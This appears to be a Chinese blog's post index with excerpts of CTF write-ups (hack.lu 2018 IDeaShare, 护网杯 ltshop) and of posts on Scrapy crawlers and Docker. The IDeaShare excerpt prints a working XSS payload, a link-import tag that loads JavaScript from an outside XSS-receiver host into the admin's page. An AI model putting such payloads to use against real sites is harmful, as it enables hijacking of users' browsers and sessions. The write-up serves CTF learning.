hacklu CTF 2018-IDeaShare-writeup

题目描述

A place to share your IDeas with your friends!

Try to win the best IDea competition but be wary a strong force prevents any cheating.

Good luck you will need it!

题目地址(2018.10.21仍可正常访问):IDeaShare

访问题目地址发现是一个分享想法的平台,用户登录后可以保存自己的想法,将保存的想法分享以后,管理员会进行查看,如果分享的想法被管理员评价为Best Idea,就会赢得BEST IDEA COMPETITION

解题思路

访问题目时,响应头中存在这样的字段X-XSS-Protection: 0,再加上知道管理员将会访问提交的想法,所以很容易想到构造XSS。但首先提交的想法中对许多关键字进行了过滤(诡异的过滤规则),其次直接访问分享的想法,也并不能看到解析生效的内容。测试中发现第二个问题可以通过HTTP参数污染来进行绕过,但直到比赛结束也没有绕过第一个问题,后来听到大佬指点可以使用link标签,下面讲一下利用过程。

阅读全文

hacklu CTF 2018-IDeaShare-writeup(After the end of the CTF)

First, there is a textarea for you to write your idea, some key words were blocked, but we can use link to import external resources, payload like this:

1
<link/rel=import href=https://https.zer0b.com/BlueLotus_XSSReceiver/myjs/tester.js>

After save this as first idea, we can access url below to bring the js into effect:

1
https://arcade.fluxfingers.net:1818/?page=view&raw&owner=304&pad=1
阅读全文

护网杯ltshop题解

登录后可以看到home与info页面,home页面中可以看到flag需要兑换才能得到,info页面中可以看到当前用户的相关信息,其中赠送了20元余额

  • 直接点击兑换flag,提示你的辣条之王还不够多

  • 输入数量,批量兑换辣条之王,当输入非数字与负数时提示兑换数目非法,继续尝试正数发现当输入在0-18446744073709551615时,提示一个也换不起,不要尝试了,当大于18446744073709551615时,提示兑换数目非法,即输入范围需要在uint64范围内

  • 点击购买大辣条,提示成功购买一个,点击4次后兑换了4包,余额为0,无法继续兑换,而兑换辣条之王需要5个大辣条,兑换0个时也提示一个也换不起,不要兑换了,所以考虑至少拥有5个大辣条才允许进行兑换操作

阅读全文

加密兔爬虫(scrapy)

之前面试要求写点小程序,记录下过程。

一.需求

编写一个加密兔 兔宝爬虫

点击链接 http://t.cn/RdGOckh ,登录后点击“领养”,抓取其中的兔宝数据。
要求:

  1. 可以指定抓取的数量(精确到十位数即可)。

  2. 获取兔宝及父母信息。兔宝信息包括编号,代数,稀有度,当前价格。父母信息包括编号、代数、稀有度、属性(包含稀有程度)。

  3. 将兔宝与父母信息输出到文件中。

  4. 编程语言不限,使用技术不限。

  5. 抓取速度越快越好。

二.分析

​ 基本需求使用Scrapy框架可快速实现。

三.环境

​ 1.Anaconda3 python3.6版本。

​ 2.Pycharm。

阅读全文

Docker初步使用

​ 之前一直听说Docker是个好东西,但是一直没仔细去了解一下,现在有了搭建环境的需求,发现使用Docker是真的方便。具体的教程这里有很详细的 Docker从入门到实践,就不细说了。这里说一点自己的理解。

虚拟机 VS Docker

​ Docker主要是解决软件的环境配置问题,与虚拟机相比,它更加轻量。虚拟机就是一台虚拟的电脑,而Docker只是对进程做了隔离,它直接使用系统的内核。这里可以说一下的是因为Docker从Linux发展而来,很多镜像都以Linux为基础,而Docker其实会使用系统的内核。所以Docker是肯定不能直接使用Windows内核的,安装Windows版本的Docker需要启用Hyper-v或者使用VirtualBox先安装一个Linux虚拟机然后使用它的内核。但因为这其中有很多优化,所以Windows使用Docker效率仍然会比用虚拟机强很多。

阅读全文

网易云音乐评论爬取(scrapy)

​ 如果好奇一个人在网易云音乐评论里说过什么的话,爬取所有歌单里歌曲的评论是个可行的方案,毕竟世界是属于我们程序员的。所以拾起Python,大概过了一遍Scrapy的教程,写了个简陋的爬虫,目前还有一些小问题,等好好研究研究再修复,这里记一下这个过程里遇到的坑。

阅读全文